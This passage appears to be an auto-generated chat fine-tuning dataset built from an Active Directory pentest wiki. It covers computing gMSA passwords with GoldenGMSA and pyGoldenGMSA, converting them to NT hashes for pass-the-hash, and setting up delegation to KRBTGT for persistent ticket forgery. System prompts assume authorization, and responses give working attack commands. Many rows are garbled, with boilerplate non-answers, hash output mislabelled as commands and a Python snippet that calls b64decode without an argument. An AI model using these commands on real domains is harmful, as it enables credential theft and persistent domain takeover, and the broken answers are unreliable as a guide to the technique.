retrieve gMSA password without the -"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about GoldenGMSA - Password calculation?", "response": "::: tabs\n\n=== Windows\n\nGiven a gMSA SID, the corresponding KDS root key (matching the RootKeyGuid obtained beforehand), and the Password ID, the actual plaintext password can be calculated with GoldenGMSA (C#).\n\n``powershell\nGoldenGMSA.exe compute --sid \"S-1-5-21-[...]1586295871-1112\" --kdskey \"AQA[...]jG2/M=\" --pwdid \"AQAAAEtEU[...]gBsAGEAYgBzAAAA\"\n`\n\nSince the password is randomly generated and is not intended to be used by real users with a keyboard (but instead by servers, programs, scripts, etc.) the password is very long, complex and can include non-printable characters. GoldenGMSA will output the password in base64.\n\nIn order to use the password, its MD4 (i.e. NT) hash can be calculated, for pass the hash.\n\n`python\nimport base64\nimport hashlib\n\nb64 = input(\"Password Base64: \")\n\nprint(\"NT hash:\", hashlib.new(\"md4\", base64.b64decode()).hexdigest())\n`\n\n=== UNIX-like\n\npyGoldenGMSA can compute gMSA passwords either online (requiring network access to the DC) or offline (using previously dumped KDS root keys), making it particularly useful for persistence scenarios where the attacker may not have continuous access to the domain.\n\nOnline computation (automatically retrieves KDS root key and password ID from the DC):\n\n`bash\npython3 main.py -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -d $DOMAIN --dc-ip $DC_IP compute --sid $GMSA_SID\n`\n\nOffline computation (no network access required, using previously dumped KDS root key and password ID):\n\n`bash\npython3 main.py compute --sid $GMSA_SID --kdskey \"AQAAAOlMCM5U37Qv......\" --pwdid \"AQAAAEtEU0sC......\"\n`\n\nUnlike the Windows tool, pyGoldenGMSA outputs the NT hash directly in both NT-only format and nxc format, eliminating the need for manual hash conversion:\n\n`\nNT hash: 1c368c74ef1bcbd4892c95a8d6de0f30\nLM:NT format: aad3b435b51404eeaad3b435b51404ee:1c368c74ef1bcbd4892c95a8d6de0f30\n`\n\n:::\n\n> [!TIP]\n> Both GoldenGMSA (C#) and pyGoldenGMSA (Python) tools featured in this recipe can retrieve gMSA password without the -", "metadata": {"corpus_index": 1214, "category": "active_directory", "source_file": "docs/src/ad/persistence/goldengmsa.md", "page_title": "GoldenGMSA", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for GoldenGMSA - Password calculation?"}, {"role": "assistant", "content": "::: tabs\n\n=== Windows\n\nGiven a gMSA SID, the corresponding KDS root key (matching the RootKeyGuid obtained beforehand), and the Password ID, the actual plaintext password can be calculated with GoldenGMSA (C#).\n\n``powershell\nGoldenGMSA.exe compute --sid \"S-1-5-21-[...]1586295871-1112\" --kdskey \"AQA[...]jG2/M=\" --pwdid \"AQAAAEtEU[...]gBsAGEAYgBzAAAA\"\n`\n\nSince the password is randomly generated and is not intended to be used by real users with a keyboard (but instead by servers, programs, scripts, etc.) the password is very long, complex and can include non-printable characters. GoldenGMSA will output the password in base64.\n\nIn order to use the password, its MD4 (i.e. NT) hash can be calculated, for pass the hash.\n\n`python\nimport base64\nimport hashlib\n\nb64 = input(\"Password Base64: \")\n\nprint(\"NT hash:\", hashlib.new(\"md4\", base64.b64decode()).hexdigest())\n`\n\n=== UNIX-like\n\npyGoldenGMSA can compute gMSA passwords either online (requiring network access to the DC) or offline (using previously dumped KDS root keys), making it particularly useful for persistence scenarios where the attacker may not have continuous access to the domain.\n\nOnline computation (automatically retrieves KDS root key and password ID from the DC):\n\n`bash\npython3 main.py -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -d $DOMAIN --dc-ip $DC_IP compute --sid $GMSA_SID\n`\n\nOffline computation (no network access required, using previously dumped KDS root key and password ID):\n\n`bash\npython3 main.py compute --sid $GMSA_SID --kdskey \"AQAAAOlMCM5U37Qv......\" --pwdid \"AQAAAEtEU0sC......\"\n`\n\nUnlike the Windows tool, pyGoldenGMSA outputs the NT hash directly in both NT-only format and nxc format, eliminating the need for manual hash conversion:\n\n`\nNT hash: 1c368c74ef1bcbd4892c95a8d6de0f30\nLM:NT format: aad3b435b51404eeaad3b435b51404ee:1c368c74ef1bcbd4892c95a8d6de0f30\n`\n\n:::\n\n> [!TIP]\n> Both GoldenGMSA (C#) and pyGoldenGMSA (Python) tools featured in this recipe can retrieve gMSA password without the -"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for GoldenGMSA - Password calculation?", "response": "::: tabs\n\n=== Windows\n\nGiven a gMSA SID, the corresponding KDS root key (matching the RootKeyGuid obtained beforehand), and the Password ID, the actual plaintext password can be calculated with GoldenGMSA (C#).\n\n``powershell\nGoldenGMSA.exe compute --sid \"S-1-5-21-[...]1586295871-1112\" --kdskey \"AQA[...]jG2/M=\" --pwdid \"AQAAAEtEU[...]gBsAGEAYgBzAAAA\"\n`\n\nSince the password is randomly generated and is not intended to be used by real users with a keyboard (but instead by servers, programs, scripts, etc.) the password is very long, complex and can include non-printable characters. GoldenGMSA will output the password in base64.\n\nIn order to use the password, its MD4 (i.e. NT) hash can be calculated, for pass the hash.\n\n`python\nimport base64\nimport hashlib\n\nb64 = input(\"Password Base64: \")\n\nprint(\"NT hash:\", hashlib.new(\"md4\", base64.b64decode()).hexdigest())\n`\n\n=== UNIX-like\n\npyGoldenGMSA can compute gMSA passwords either online (requiring network access to the DC) or offline (using previously dumped KDS root keys), making it particularly useful for persistence scenarios where the attacker may not have continuous access to the domain.\n\nOnline computation (automatically retrieves KDS root key and password ID from the DC):\n\n`bash\npython3 main.py -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -d $DOMAIN --dc-ip $DC_IP compute --sid $GMSA_SID\n`\n\nOffline computation (no network access required, using previously dumped KDS root key and password ID):\n\n`bash\npython3 main.py compute --sid $GMSA_SID --kdskey \"AQAAAOlMCM5U37Qv......\" --pwdid \"AQAAAEtEU0sC......\"\n`\n\nUnlike the Windows tool, pyGoldenGMSA outputs the NT hash directly in both NT-only format and nxc format, eliminating the need for manual hash conversion:\n\n`\nNT hash: 1c368c74ef1bcbd4892c95a8d6de0f30\nLM:NT format: aad3b435b51404eeaad3b435b51404ee:1c368c74ef1bcbd4892c95a8d6de0f30\n`\n\n:::\n\n> [!TIP]\n> Both GoldenGMSA (C#) and pyGoldenGMSA (Python) tools featured in this recipe can retrieve gMSA password without the -", "metadata": {"corpus_index": 1214, "category": "active_directory", "source_file": "docs/src/ad/persistence/goldengmsa.md", "page_title": "GoldenGMSA", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Show me the GoldenGMSA.exe command for goldengmsa - password calculation"}, {"role": "assistant", "content": "GoldenGMSA.exe compute --sid \"S-1-5-21-[...]1586295871-1112\" --kdskey \"AQA[...]jG2/M=\" --pwdid \"AQAAAEtEU[...]gBsAGEAYgBzAAAA\""}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Show me the GoldenGMSA.exe command for goldengmsa - password calculation", "response": "GoldenGMSA.exe compute --sid \"S-1-5-21-[...]1586295871-1112\" --kdskey \"AQA[...]jG2/M=\" --pwdid \"AQAAAEtEU[...]gBsAGEAYgBzAAAA\"", "metadata": {"corpus_index": 1215, "category": "active_directory", "source_file": "docs/src/ad/persistence/goldengmsa.md", "page_title": "GoldenGMSA", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "GoldenGMSA.exe"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform GoldenGMSA - Password calculation?"}, {"role": "assistant", "content": "GoldenGMSA.exe compute --sid \"S-1-5-21-[...]1586295871-1112\" --kdskey \"AQA[...]jG2/M=\" --pwdid \"AQAAAEtEU[...]gBsAGEAYgBzAAAA\""}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform GoldenGMSA - Password calculation?", "response": "GoldenGMSA.exe compute --sid \"S-1-5-21-[...]1586295871-1112\" --kdskey \"AQA[...]jG2/M=\" --pwdid \"AQAAAEtEU[...]gBsAGEAYgBzAAAA\"", "metadata": {"corpus_index": 1215, "category": "active_directory", "source_file": "docs/src/ad/persistence/goldengmsa.md", "page_title": "GoldenGMSA", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `GoldenGMSA.exe compute --sid \"S-1-5-21-[...]1586295871-1112\" --kdskey \"AQA[...]jG2/M=\" --pwdid \"AQAAAEtEU[...]gBsAGEAYgBzAAAA\"`?"}, {"role": "assistant", "content": "This command is used for goldengmsa - password calculation. Password calculation"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `GoldenGMSA.exe compute --sid \"S-1-5-21-[...]1586295871-1112\" --kdskey \"AQA[...]jG2/M=\" --pwdid \"AQAAAEtEU[...]gBsAGEAYgBzAAAA\"`?", "response": "This command is used for goldengmsa - password calculation. Password calculation", "metadata": {"corpus_index": 1215, "category": "active_directory", "source_file": "docs/src/ad/persistence/goldengmsa.md", "page_title": "GoldenGMSA", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "How do I use import for goldengmsa - password calculation?"}, {"role": "assistant", "content": "import base64\nimport hashlib\n\nb64 = input(\"Password Base64: \")\n\nprint(\"NT hash:\", hashlib.new(\"md4\", base64.b64decode()).hexdigest())"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "How do I use import for goldengmsa - password calculation?", "response": "import base64\nimport hashlib\n\nb64 = input(\"Password Base64: \")\n\nprint(\"NT hash:\", hashlib.new(\"md4\", base64.b64decode()).hexdigest())", "metadata": {"corpus_index": 1216, "category": "active_directory", "source_file": "docs/src/ad/persistence/goldengmsa.md", "page_title": "GoldenGMSA", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "import"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do GoldenGMSA - Password calculation"}, {"role": "assistant", "content": "import base64\nimport hashlib\n\nb64 = input(\"Password Base64: \")\n\nprint(\"NT hash:\", hashlib.new(\"md4\", base64.b64decode()).hexdigest())"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do GoldenGMSA - Password calculation", "response": "import base64\nimport hashlib\n\nb64 = input(\"Password Base64: \")\n\nprint(\"NT hash:\", hashlib.new(\"md4\", base64.b64decode()).hexdigest())", "metadata": {"corpus_index": 1216, "category": "active_directory", "source_file": "docs/src/ad/persistence/goldengmsa.md", "page_title": "GoldenGMSA", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `import base64`?"}, {"role": "assistant", "content": "This command is used for goldengmsa - password calculation. Password calculation"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `import base64`?", "response": "This command is used for goldengmsa - password calculation. Password calculation", "metadata": {"corpus_index": 1216, "category": "active_directory", "source_file": "docs/src/ad/persistence/goldengmsa.md", "page_title": "GoldenGMSA", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Give me the python3 command to goldengmsa - password calculation"}, {"role": "assistant", "content": "python3 main.py -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -d $DOMAIN --dc-ip $DC_IP compute --sid $GMSA_SID"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Give me the python3 command to goldengmsa - password calculation", "response": "python3 main.py -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -d $DOMAIN --dc-ip $DC_IP compute --sid $GMSA_SID", "metadata": {"corpus_index": 1217, "category": "active_directory", "source_file": "docs/src/ad/persistence/goldengmsa.md", "page_title": "GoldenGMSA", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "python3"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on GoldenGMSA - Password calculation"}, {"role": "assistant", "content": "python3 main.py -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -d $DOMAIN --dc-ip $DC_IP compute --sid $GMSA_SID"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on GoldenGMSA - Password calculation", "response": "python3 main.py -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -d $DOMAIN --dc-ip $DC_IP compute --sid $GMSA_SID", "metadata": {"corpus_index": 1217, "category": "active_directory", "source_file": "docs/src/ad/persistence/goldengmsa.md", "page_title": "GoldenGMSA", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `python3 main.py -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -d $DOMAIN --dc-ip $DC_IP compute --sid $GMSA_SID`?"}, {"role": "assistant", "content": "This command is used for goldengmsa - password calculation. Password calculation"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `python3 main.py -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -d $DOMAIN --dc-ip $DC_IP compute --sid $GMSA_SID`?", "response": "This command is used for goldengmsa - password calculation. Password calculation", "metadata": {"corpus_index": 1217, "category": "active_directory", "source_file": "docs/src/ad/persistence/goldengmsa.md", "page_title": "GoldenGMSA", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Give me the python3 command to goldengmsa - password calculation"}, {"role": "assistant", "content": "python3 main.py compute --sid $GMSA_SID --kdskey \"AQAAAOlMCM5U37Qv......\" --pwdid \"AQAAAEtEU0sC......\""}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Give me the python3 command to goldengmsa - password calculation", "response": "python3 main.py compute --sid $GMSA_SID --kdskey \"AQAAAOlMCM5U37Qv......\" --pwdid \"AQAAAEtEU0sC......\"", "metadata": {"corpus_index": 1218, "category": "active_directory", "source_file": "docs/src/ad/persistence/goldengmsa.md", "page_title": "GoldenGMSA", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "python3"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute GoldenGMSA - Password calculation?"}, {"role": "assistant", "content": "python3 main.py compute --sid $GMSA_SID --kdskey \"AQAAAOlMCM5U37Qv......\" --pwdid \"AQAAAEtEU0sC......\""}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute GoldenGMSA - Password calculation?", "response": "python3 main.py compute --sid $GMSA_SID --kdskey \"AQAAAOlMCM5U37Qv......\" --pwdid \"AQAAAEtEU0sC......\"", "metadata": {"corpus_index": 1218, "category": "active_directory", "source_file": "docs/src/ad/persistence/goldengmsa.md", "page_title": "GoldenGMSA", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `python3 main.py compute --sid $GMSA_SID --kdskey \"AQAAAOlMCM5U37Qv......\" --pwdid \"AQAAAEtEU0sC......\"`?"}, {"role": "assistant", "content": "This command is used for goldengmsa - password calculation. Password calculation"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `python3 main.py compute --sid $GMSA_SID --kdskey \"AQAAAOlMCM5U37Qv......\" --pwdid \"AQAAAEtEU0sC......\"`?", "response": "This command is used for goldengmsa - password calculation. Password calculation", "metadata": {"corpus_index": 1218, "category": "active_directory", "source_file": "docs/src/ad/persistence/goldengmsa.md", "page_title": "GoldenGMSA", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Show me the NT command for goldengmsa - password calculation"}, {"role": "assistant", "content": "NT hash: 1c368c74ef1bcbd4892c95a8d6de0f30\nLM:NT format: aad3b435b51404eeaad3b435b51404ee:1c368c74ef1bcbd4892c95a8d6de0f30"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Show me the NT command for goldengmsa - password calculation", "response": "NT hash: 1c368c74ef1bcbd4892c95a8d6de0f30\nLM:NT format: aad3b435b51404eeaad3b435b51404ee:1c368c74ef1bcbd4892c95a8d6de0f30", "metadata": {"corpus_index": 1219, "category": "active_directory", "source_file": "docs/src/ad/persistence/goldengmsa.md", "page_title": "GoldenGMSA", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "NT"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out GoldenGMSA - Password calculation during a pentest?"}, {"role": "assistant", "content": "NT hash: 1c368c74ef1bcbd4892c95a8d6de0f30\nLM:NT format: aad3b435b51404eeaad3b435b51404ee:1c368c74ef1bcbd4892c95a8d6de0f30"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out GoldenGMSA - Password calculation during a pentest?", "response": "NT hash: 1c368c74ef1bcbd4892c95a8d6de0f30\nLM:NT format: aad3b435b51404eeaad3b435b51404ee:1c368c74ef1bcbd4892c95a8d6de0f30", "metadata": {"corpus_index": 1219, "category": "active_directory", "source_file": "docs/src/ad/persistence/goldengmsa.md", "page_title": "GoldenGMSA", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `NT hash: 1c368c74ef1bcbd4892c95a8d6de0f30`?"}, {"role": "assistant", "content": "This command is used for goldengmsa - password calculation. Password calculation"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `NT hash: 1c368c74ef1bcbd4892c95a8d6de0f30`?", "response": "This command is used for goldengmsa - password calculation. Password calculation", "metadata": {"corpus_index": 1219, "category": "active_directory", "source_file": "docs/src/ad/persistence/goldengmsa.md", "page_title": "GoldenGMSA", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does Delegation to KRBTGT - Theory work?"}, {"role": "assistant", "content": "The idea behind this technique is to configure resource-based constrained delegation on the krbtgt account to generate TGTs on-demand as a persistence technique. The requirements for the technique are to have enough privileges (i.e. domain admin rights) to edit the krbtgt account's \"rbcd\" attribute (i.e. ms-DS-Allowed-To-Act-On-Behalf-Of-Other-Identity) and to control an account that has an SPN (or create one, or do SPN-less RBCD).\n\nOnce the delegation is configured, an attacker can later on obtain a service ticket for the krbtgt on behalf of any user. \n\nSince a TGT is just a Service Ticket for the KRBTGT service, it means the attacker has a persistence technique allowing him to obtain a TGT for almost any user in the domain. The only limitations are the \"Protected Users\" group, or the \"Account is sensitive and cannot be delegated\" parameter. Those settings can protect users from delegation and will prevent attackers from obtaining a ticket that looks like a TGT on their behalf through a delegation trick.\n\nAn example of the abuse goes as follows :\n\n1. Configure RBCD delegation on the krbtgt account to allow a controlled account to delegate to it. The controlled account should have at least one SPN (i.e. ServicePrincipalName) for the delegation to work (or, see SPN-less RBCD). This controlled account will be called \"ControlledAccountWithSPN\".\n2. Perform a full S4U attack to obtain a Service Ticket for the krbtgt service, on behalf of another privileged user. Let's call this chosen user \"TargetedAccount\". The ticket obtained through this process is for the KRBTGT service, which basically means the ticket can be used as a TGT for the TargetedAccount.\n3. Pass-the-ticket to use the Service-Ticket-that-is-in-fact-a-TGT, act as the target -privileged- user, and authenticate to remote resources."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does Delegation to KRBTGT - Theory work?", "response": "The idea behind this technique is to configure resource-based constrained delegation on the krbtgt account to generate TGTs on-demand as a persistence technique. The requirements for the technique are to have enough privileges (i.e. domain admin rights) to edit the krbtgt account's \"rbcd\" attribute (i.e. ms-DS-Allowed-To-Act-On-Behalf-Of-Other-Identity) and to control an account that has an SPN (or create one, or do SPN-less RBCD).\n\nOnce the delegation is configured, an attacker can later on obtain a service ticket for the krbtgt on behalf of any user. \n\nSince a TGT is just a Service Ticket for the KRBTGT service, it means the attacker has a persistence technique allowing him to obtain a TGT for almost any user in the domain. The only limitations are the \"Protected Users\" group, or the \"Account is sensitive and cannot be delegated\" parameter. Those settings can protect users from delegation and will prevent attackers from obtaining a ticket that looks like a TGT on their behalf through a delegation trick.\n\nAn example of the abuse goes as follows :\n\n1. Configure RBCD delegation on the krbtgt account to allow a controlled account to delegate to it. The controlled account should have at least one SPN (i.e. ServicePrincipalName) for the delegation to work (or, see SPN-less RBCD). This controlled account will be called \"ControlledAccountWithSPN\".\n2. Perform a full S4U attack to obtain a Service Ticket for the krbtgt service, on behalf of another privileged user. Let's call this chosen user \"TargetedAccount\". The ticket obtained through this process is for the KRBTGT service, which basically means the ticket can be used as a TGT for the TargetedAccount.\n3. Pass-the-ticket to use the Service-Ticket-that-is-in-fact-a-TGT, act as the target -privileged- user, and authenticate to remote resources.", "metadata": {"corpus_index": 1220, "category": "active_directory", "source_file": "docs/src/ad/persistence/kerberos/delegation-to-krbtgt.md", "page_title": "Delegation to KRBTGT", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for Delegation to KRBTGT - Theory?"}, {"role": "assistant", "content": "The idea behind this technique is to configure resource-based constrained delegation on the krbtgt account to generate TGTs on-demand as a persistence technique. The requirements for the technique are to have enough privileges (i.e. domain admin rights) to edit the krbtgt account's \"rbcd\" attribute (i.e. ms-DS-Allowed-To-Act-On-Behalf-Of-Other-Identity) and to control an account that has an SPN (or create one, or do SPN-less RBCD).\n\nOnce the delegation is configured, an attacker can later on obtain a service ticket for the krbtgt on behalf of any user. \n\nSince a TGT is just a Service Ticket for the KRBTGT service, it means the attacker has a persistence technique allowing him to obtain a TGT for almost any user in the domain. The only limitations are the \"Protected Users\" group, or the \"Account is sensitive and cannot be delegated\" parameter. Those settings can protect users from delegation and will prevent attackers from obtaining a ticket that looks like a TGT on their behalf through a delegation trick.\n\nAn example of the abuse goes as follows :\n\n1. Configure RBCD delegation on the krbtgt account to allow a controlled account to delegate to it. The controlled account should have at least one SPN (i.e. ServicePrincipalName) for the delegation to work (or, see SPN-less RBCD). This controlled account will be called \"ControlledAccountWithSPN\".\n2. Perform a full S4U attack to obtain a Service Ticket for the krbtgt service, on behalf of another privileged user. Let's call this chosen user \"TargetedAccount\". The ticket obtained through this process is for the KRBTGT service, which basically means the ticket can be used as a TGT for the TargetedAccount.\n3. Pass-the-ticket to use the Service-Ticket-that-is-in-fact-a-TGT, act as the target -privileged- user, and authenticate to remote resources."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for Delegation to KRBTGT - Theory?", "response": "The idea behind this technique is to configure resource-based constrained delegation on the krbtgt account to generate TGTs on-demand as a persistence technique. The requirements for the technique are to have enough privileges (i.e. domain admin rights) to edit the krbtgt account's \"rbcd\" attribute (i.e. ms-DS-Allowed-To-Act-On-Behalf-Of-Other-Identity) and to control an account that has an SPN (or create one, or do SPN-less RBCD).\n\nOnce the delegation is configured, an attacker can later on obtain a service ticket for the krbtgt on behalf of any user. \n\nSince a TGT is just a Service Ticket for the KRBTGT service, it means the attacker has a persistence technique allowing him to obtain a TGT for almost any user in the domain. The only limitations are the \"Protected Users\" group, or the \"Account is sensitive and cannot be delegated\" parameter. Those settings can protect users from delegation and will prevent attackers from obtaining a ticket that looks like a TGT on their behalf through a delegation trick.\n\nAn example of the abuse goes as follows :\n\n1. Configure RBCD delegation on the krbtgt account to allow a controlled account to delegate to it. The controlled account should have at least one SPN (i.e. ServicePrincipalName) for the delegation to work (or, see SPN-less RBCD). This controlled account will be called \"ControlledAccountWithSPN\".\n2. Perform a full S4U attack to obtain a Service Ticket for the krbtgt service, on behalf of another privileged user. Let's call this chosen user \"TargetedAccount\". The ticket obtained through this process is for the KRBTGT service, which basically means the ticket can be used as a TGT for the TargetedAccount.\n3. Pass-the-ticket to use the Service-Ticket-that-is-in-fact-a-TGT, act as the target -privileged- user, and authenticate to remote resources.", "metadata": {"corpus_index": 1220, "category": "active_directory", "source_file": "docs/src/ad/persistence/kerberos/delegation-to-krbtgt.md", "page_title": "Delegation to KRBTGT", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does Delegation to KRBTGT - Practice work?"}, {"role": "assistant", "content": "::: tabs\n\n=== UNIX-like\n\nEvery step of this attack can be achieved using one of the following scripts from Impacket (Python), such as rbcd.py and getST.py.\n\n```bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does Delegation to KRBTGT - Practice work?", "response": "::: tabs\n\n=== UNIX-like\n\nEvery step of this attack can be achieved using one of the following scripts from Impacket (Python), such as rbcd.py and getST.py.\n\n```bash", "metadata": {"corpus_index": 1221, "category": "active_directory", "source_file": "docs/src/ad/persistence/kerberos/delegation-to-krbtgt.md", "page_title": "Delegation to KRBTGT", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute Delegation to KRBTGT - Practice?"}, {"role": "assistant", "content": "::: tabs\n\n=== UNIX-like\n\nEvery step of this attack can be achieved using one of the following scripts from Impacket (Python), such as rbcd.py and getST.py.\n\n```bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and 